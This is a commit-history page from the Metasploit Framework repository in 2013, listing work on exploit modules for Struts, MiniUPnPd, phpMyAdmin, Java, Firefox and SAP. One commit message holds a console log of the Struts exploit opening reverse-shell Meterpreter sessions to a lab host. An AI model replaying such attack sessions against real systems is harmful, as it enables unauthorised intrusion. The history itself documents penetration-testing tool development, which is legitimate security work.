Commit Graph

1047 Commits (2d6c76d0ad1fac45a47b7b7b953e92f4624a0725)

Author SHA1 Message Date
jvazquez-r7 0b9cf213df Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-12 12:03:10 -05:00
Joe Vennix 45da645717 Update ff svg exploit description to be more accurate. 2013-06-11 12:12:18 -05:00
jvazquez-r7 b20a38add4 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-10 12:22:52 -05:00
Tod Beardsley f58e279066 Cleanup on module names, descriptions. 2013-06-10 10:52:22 -05:00
jvazquez-r7 9d0047ff74 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-07 16:44:52 -05:00
jvazquez-r7 79bfdf3ca6 Add comment to explain the applet delivery methods 2013-06-07 14:20:21 -05:00
jvazquez-r7 641fd3c6ce Add also the msf module 2013-06-07 13:39:19 -05:00
jvazquez-r7 6497e5c7a1 Move exploit under the linux tree 2013-06-04 08:53:18 -05:00
jvazquez-r7 0bf2f51622 Land #1843, @viris exploit for CVE-2013-0230 2013-06-04 08:52:09 -05:00
jvazquez-r7 86c768ad02 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-04 08:15:28 -05:00
Dejan Lukan 8ced3483de Deleted some undeeded comments and used the text_rand function rather than static values. 2013-06-04 08:44:47 +02:00
sinn3r ad87065b9a Land #1904 - Undefined variable 'path' in tomcat_deploy_mgr.rb 2013-06-04 01:35:13 -05:00
Ruslaideemin 71bc06d576 Fix undefined variable in tomcat_mgr_deploy.rb
Exploit failed (multi/http/tomcat_mgr_deploy): NameError undefined
local variable or method `path' for #<Msf...>
[06/04/2013 10:14:03] [d(3)] core: Call stack:
modules/exploits/multi/http/tomcat_mgr_deploy.rb:253:in `exploit'
lib/msf/core/exploit_driver.rb:205:in `job_run_proc'
lib/msf/core/exploit_driver.rb:166:in `run'
lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
lib/msf/ui/console/command_dispatcher/exploit.rb:111:in `cmd_exploit'
lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
lib/rex/ui/text/shell.rb:200:in `run'
lib/msf/ui/web/console.rb:71:in `block in initialize'
lib/msf/core/thread_manager.rb💯in `call'
lib/msf/core/thread_manager.rb💯in `block in spawn'

Uses path instead of path_tmp in error messages.
2013-06-04 11:19:28 +10:00
jvazquez-r7 4079484968 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-03 15:27:36 -05:00
Tod Beardsley 4cf682691c New module title and description fixes 2013-06-03 14:40:38 -05:00
Dejan Lukan df20e79375 Deleted the handle because it's not required and check() function. 2013-06-03 10:18:43 +02:00
Dejan Lukan 36f275d71a Changed the send_request_raw into send_request_cgi function. 2013-06-03 10:06:24 +02:00
Dejan Lukan 675fbb3045 Deleted the DoS UPnP modules, because they are not relevant to the current branch. 2013-06-03 09:45:29 +02:00
Dejan Lukan 1ceed1e44a Added corrected MiniUPnP module. 2013-06-03 09:37:04 +02:00
Dejan Lukan d656360c24 Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow vulnerability 2013-06-03 09:37:03 +02:00
Dejan Lukan 39e4573d86 Added CVE-2013-0229 for MiniUPnPd < 1.4 2013-06-03 09:37:03 +02:00
jvazquez-r7 f68d35f251 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-01 17:09:23 -05:00
Steve Tornio 80f1e98952 added osvdb refs 2013-06-01 07:04:43 -05:00
jvazquez-r7 48b14c09e3 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-31 01:12:46 -05:00
jvazquez-r7 146a30ec4d Do minor cleanup for struts_include_params 2013-05-31 01:01:15 -05:00
jvazquez-r7 a7a754ae1f Land #1870, @Console exploit for Struts includeParams injection 2013-05-31 00:59:33 -05:00
Console eb4162d41b boolean issue fix 2013-05-30 18:15:33 +01:00
Console 5fa8ecd334 removed magic number 109
now calculated from the actual length of all static URL elements
2013-05-30 17:40:43 +01:00
Console 47524a0570 converted request params to hash merge operation 2013-05-30 15:36:01 +01:00
Console 51879ab9c7 removed unnecessary lines 2013-05-30 15:15:10 +01:00
Console abb0ab12f6 Fix msftidy compliance 2013-05-30 13:10:24 +01:00
Console 5233ac4cbd Progress bar instead of message spam. 2013-05-30 13:08:43 +01:00
Console fb388c6463 Chunk length is now "huge" for POST method
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
Console ab6a2a049b Fix issue with JAVA meterpreter failing to work.
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
Console d70526f4cc Renamed as per suggestion 2013-05-30 09:29:26 +01:00
Console 7c38324b76 Considered using the bourne stager.
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
Console ec315ad50d Modified URI handling to make use of target_uri and vars_get/post.
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
Console b39531cea6 Added references 2013-05-28 23:15:10 +01:00
jvazquez-r7 66ea59b03f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-28 15:22:46 -05:00
Console 7b43117d87 Added RCE for Struts versions earlier than 2.3.14.2
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
2013-05-28 18:26:57 +01:00
James Lee 9843dc4cb4 Land #1708, android meterpreter
Conflicts:
	data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
Tod Beardsley 75d6c8079a Spelling, whitespace
Please be sure to run msftidy.rb on new modules. Thanks!
2013-05-28 10:03:37 -05:00
jvazquez-r7 d5cf6c1fbc Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-23 12:37:54 -05:00
sinn3r 81ad280107 Landing #1856 - CVE-2013-0758 Firefox <= 17.0.1 + Flash RCE
Chained exploit using CVE-2013-0758 and CVE-2013-0757
2013-05-23 12:21:10 -05:00
sinn3r 67861794f6 Fix automatic payload selection 2013-05-22 22:37:18 -05:00
sinn3r 23fe3146dc Extra print_status I don't want 2013-05-22 14:38:30 -05:00
sinn3r 0e6576747a Fix target selection probs, and swf path 2013-05-22 14:34:00 -05:00
jvazquez-r7 0dee5ae94d Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-22 12:54:44 -05:00
Joe Vennix aae4768563 Fix whitespace issues from msftidy. 2013-05-21 14:31:36 -05:00
Joe Vennix eaeb10742a Add some comments and clean some things up. 2013-05-21 14:01:14 -05:00
Joe Vennix 978aafcb16 Add DEBUG option, pass args to .encoded_exe(). 2013-05-21 14:01:14 -05:00
Joe Vennix ee8a97419c Add some debug print calls to investigate Auto platform selection. 2013-05-21 14:01:13 -05:00
Joe Vennix 60fdf48535 Use renegerate_payload(cli, ...). 2013-05-21 14:01:13 -05:00
James Lee f4498c3916 Remove $Id tags
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
jvazquez-r7 0f3b13e21d up to date 2013-05-16 15:02:41 -05:00
James Lee 3009bdb57e Add a few more references for those without 2013-05-16 14:32:02 -05:00
h0ng10 378f0fff5b added missing comma 2013-05-16 18:59:46 +02:00
Joe Vennix 1a5c747bb9 Update description. 2013-05-15 23:52:51 -05:00
Joe Vennix 178a43a772 Whitespace tweaks and minor bug fix. Wrong payloads still run. 2013-05-15 23:47:04 -05:00
Joe Vennix f4b6db8c49 Tweak whitespace. 2013-05-15 23:35:59 -05:00
Joe Vennix a7d79e2a51 Oops, don't cache payload_filename. 2013-05-15 23:34:14 -05:00
Joe Vennix 4d5c4f68cb Initial commit, works on three OSes, but automatic mode fails. 2013-05-15 23:32:02 -05:00
jvazquez-r7 cb24d3ddae Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-15 11:13:29 -05:00
James Lee 61afe1449e Landing #1275, bash cmdstager
Conflicts:
	lib/rex/exploitation/cmdstager.rb

Conflict was just the $Id$ tag, which is no longer used anyway.
2013-05-15 10:44:05 -05:00
jvazquez-r7 352a7afcd6 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-14 22:29:24 -05:00
sinn3r 41e9f35f3f Landing #1819 - Convert sap_mgmt_con_osexec_payload to multi platform 2013-05-14 14:48:16 -05:00
jvazquez-r7 b9caa23b30 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-14 12:26:23 -05:00
Tod Beardsley e3384439ed 64-bit, not '64 bits' 2013-05-13 15:40:17 -05:00
jvazquez-r7 495f1e5013 Add multi platform module for SAP MC exec exploit 2013-05-12 08:46:00 -05:00
jvazquez-r7 891e36c947 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-09 17:47:35 -05:00
jvazquez-r7 4147a27216 Land #1667, @nmonkee's sap_soap_rfc_sxpg_command_exec exploit 2013-05-09 17:00:11 -05:00
jvazquez-r7 6842432abb Land #1678, @nmonkee's sap_soap_rfc_sxpg_call_system_exec exploit 2013-05-09 16:52:01 -05:00
jvazquez-r7 e939de583c Clean up and multi platform support for sap_soap_rfc_sxpg_command_exec 2013-05-07 22:46:39 -05:00
jvazquez-r7 5f59d9f723 Move sap_soap_rfc_sxpg_command_exec to multi dir 2013-05-07 22:46:04 -05:00
jvazquez-r7 ab60e0bfb7 Fix print message 2013-05-07 22:41:15 -05:00
jvazquez-r7 24bad9c15c Clean up sap_soap_rfc_sxpg_call_system_exec and make it multi platform 2013-05-07 17:03:10 -05:00
jvazquez-r7 76f6d9f130 Move module to multi-platform location 2013-05-07 17:01:56 -05:00
jvazquez-r7 a4632b773a Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-28 12:59:16 -05:00
sinn3r 1d9a695d2b Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
[Closes #1772]
2013-04-28 12:17:16 -05:00
Meatballs ccb630eca2 Whitespace and change default user 2013-04-27 10:39:27 +01:00
Meatballs 209188bc22 Add refs and use targeturi 2013-04-27 10:35:49 +01:00
Meatballs 3ac041386b Add php version to check 2013-04-26 23:59:49 +01:00
Meatballs e25fdebd8d Add php version to check 2013-04-26 23:58:08 +01:00
Meatballs cd842df3e2 Correct phpMyAdmin 2013-04-26 23:38:27 +01:00
Meatballs 6bb2af7cee Add pma url 2013-04-26 23:37:26 +01:00
James Lee a0c1b6d1ce Clear out PMA's error handler
* Add an error_handler function that just returns true. This prevents eventual
  ENOMEM errors and segfaults like these:
    [Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error:  Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156
    [Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11)
* clean up some whitespace
2013-04-26 15:25:09 -05:00
Meatballs 1f2cab7aef Tidyup and getcookies 2013-04-26 20:26:04 +01:00
Meatballs 0901d00da5 Remove redundant pay opts 2013-04-26 19:26:29 +01:00
Meatballs a17d61897d Change to send_rq_cgi 2013-04-26 19:19:11 +01:00
Meatballs 54233e9fba Better entropy 2013-04-26 17:46:43 +01:00
Meatballs c8da13cfa0 Add some entropy in request 2013-04-26 17:34:17 +01:00
Meatballs a043d3b456 Fix auth check and cookie handling 2013-04-26 17:10:24 +01:00
Meatballs 025315e4e4 Move to http 2013-04-26 15:42:26 +01:00
Meatballs 9ad19ed2bf Final tidyup 2013-04-26 15:41:28 +01:00
Meatballs c7ac647e4e Initial attempt lfi 2013-04-26 14:32:18 +01:00
jvazquez-r7 2a41422276 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-25 20:24:17 -05:00
jvazquez-r7 bf0375f0e9 Fix @jlee-r7's feedback 2013-04-25 18:43:21 -05:00
jvazquez-r7 8eea476cb8 Build the jnlp uri when resource is available 2013-04-25 18:43:21 -05:00
jvazquez-r7 cc961977a2 Add bypass for click2play 2013-04-25 18:43:21 -05:00
jvazquez-r7 1761b1ad7b Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-23 17:35:35 -05:00
jvazquez-r7 ece36c0610 Update references for the las Java exploit 2013-04-22 21:55:04 -05:00
jvazquez-r7 b6365db0b5 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-22 09:38:32 -05:00
jvazquez-r7 1365dfe68c Add Oracle url 2013-04-20 01:43:14 -05:00
jvazquez-r7 b99fc06b6f description updated 2013-04-20 01:43:14 -05:00
jvazquez-r7 19f2e72dbb Added module for Java 7u17 sandboxy bypass 2013-04-20 01:43:13 -05:00
jvazquez-r7 bbf7cc4394 up to date 2013-04-17 11:54:12 -05:00
jvazquez-r7 48def7dbdb up to date 2013-04-17 06:36:44 -05:00
Jon Hart 83ec9757ec Addressed feedback from PR#1717 2013-04-16 19:00:26 -07:00
jvazquez-r7 cc35591723 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-15 17:43:15 -05:00
Tod Beardsley 873bdbab57 Removing APSB13-03, not ready.
This was landed by @todb-r7 on #1709 but that was premature. #1717 was
a proposed set of fixes, but it didn't go far enough.

@jhart-r7 and @jvazquez-r7 should revisit this module for sure, there's
some good stuff in there, but it's not ready for a real release quite
yet. Take a look at the issues discussed in those PRs and open a new PR
with a new module?

Sorry for the switcheroo, not trying to be a jerk.

[Closes #1717]
2013-04-15 13:36:47 -05:00
timwr 32bd812bdb android meterpreter 2013-04-12 18:57:04 +01:00
jvazquez-r7 2ab7552a85 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-10 09:11:41 +02:00
Tod Beardsley 0d2746fb4c defs should have parens when taking args
While it's allowed in ruby to drop most parens, many are useful for
readability.

Also adds a missing CVE.
2013-04-09 17:57:52 -05:00
Tod Beardsley 90e986860e Adding most suggested changes to jhart's adobe module 2013-04-09 17:55:28 -05:00
Jon Hart 8a98b1af4a Added command mode, plus fixed the dropping of payloads 2013-04-07 15:39:38 -07:00
Jon Hart f482496795 Initial commit of an exploit module for the CVEs covered by APSB13-03.
Not complete but will currently get command execution on Coldfusion 9.x
instances with CSRF protection disabled
2013-04-06 20:08:50 -07:00
jvazquez-r7 358c43f6f6 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-03 19:17:53 +02:00
Tod Beardsley e4d901d12c Space at EOL (msftidy) 2013-04-03 09:20:01 -05:00
jvazquez-r7 070fd399f2 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-03-31 20:23:08 +02:00
jvazquez-r7 315abd8839 fix Privileged field 2013-03-30 19:39:01 +01:00
jvazquez-r7 a46805d95d description updated 2013-03-30 19:36:35 +01:00
jvazquez-r7 c880a63e75 Added module for ZDI-13-049 2013-03-30 19:35:04 +01:00
jvazquez-r7 224188ddf6 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-03-29 21:49:40 +01:00
jvazquez-r7 714fc83cfe Merge branch 'Ra1NX_pubcall' of https://github.com/bwall/metasploit-framework into bwall-Ra1NX_pubcall 2013-03-29 19:58:06 +01:00
bwall 21ea1c9ed4 Merge branch 'Ra1NX_pubcall' of https://github.com/bwall/metasploit-framework into Ra1NX_pubcall 2013-03-29 13:29:38 -04:00
bwall 10d9e86b42 Renamed file to be all lower case 2013-03-29 13:29:05 -04:00
jvazquez-r7 cd1820d769 trying to solve irc comm issues 2013-03-29 12:54:57 +01:00
bwall 6cf44d9c85 added a 3 message window for recieving the check response 2013-03-28 21:14:52 -04:00
jvazquez-r7 e9842eac2e Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-03-28 15:18:41 +01:00
jvazquez-r7 29ad9939e1 cleanup for stunshell_eval 2013-03-28 15:11:20 +01:00
jvazquez-r7 514aed404c Merge branch 'STUNSHELL_eval' of https://github.com/bwall/metasploit-framework into bwall-STUNSHELL_eval 2013-03-28 15:10:57 +01:00
jvazquez-r7 3ffbc5e5b3 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-03-28 14:58:43 +01:00
jvazquez-r7 9b18eb858b cleanup for stunshell_exec 2013-03-28 14:45:51 +01:00
jvazquez-r7 a7a5569725 Merge branch 'STUNSHELL_exec' of https://github.com/bwall/metasploit-framework into bwall-STUNSHELL_exec 2013-03-28 14:45:28 +01:00
jvazquez-r7 6cd6a7d6b9 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-03-28 12:16:18 +01:00
bwall ce9f11aeb3 Changed the targets to be more specific 2013-03-27 17:22:29 -04:00
bwall f14d5ba8ec Removed extra comma 2013-03-27 17:15:34 -04:00
bwall 2a60ef2d60 Renamed and fixed some code issues 2013-03-27 17:14:41 -04:00
bwall cc92b54e83 Moved module and cleaned code 2013-03-27 17:03:18 -04:00
bwall 76fb6ff48f Updated ranking 2013-03-27 16:41:35 -04:00
jvazquez-r7 e25a06c649 delete comma 2013-03-27 21:33:58 +01:00
jvazquez-r7 5fc5a4f429 use target_uri 2013-03-27 20:45:34 +01:00
jvazquez-r7 f29cfbf393 cleanup for v0pCr3w_exec 2013-03-27 20:38:11 +01:00
bwall fd302d62b8 Removed testing code 2013-03-27 12:50:42 -04:00
jvazquez-r7 787f8cc32f up to date 2013-03-26 12:18:53 +01:00
jvazquez-r7 6f5fc77019 up to date 2013-03-26 11:59:41 +01:00
jvazquez-r7 2d0a813aa6 Merge branch 'heyder-joomla' of https://github.com/heyder/metasploit-framework 2013-03-26 11:23:33 +01:00
bwall a5346240de Updated v0pCr3w_exec to use send_request_cgi 2013-03-26 01:33:30 -04:00
heyder 014c01099e improve cleanup 2013-03-26 02:22:10 -03:00
bwall 5218831167 Added license information and tidied up the code 2013-03-25 00:05:31 -04:00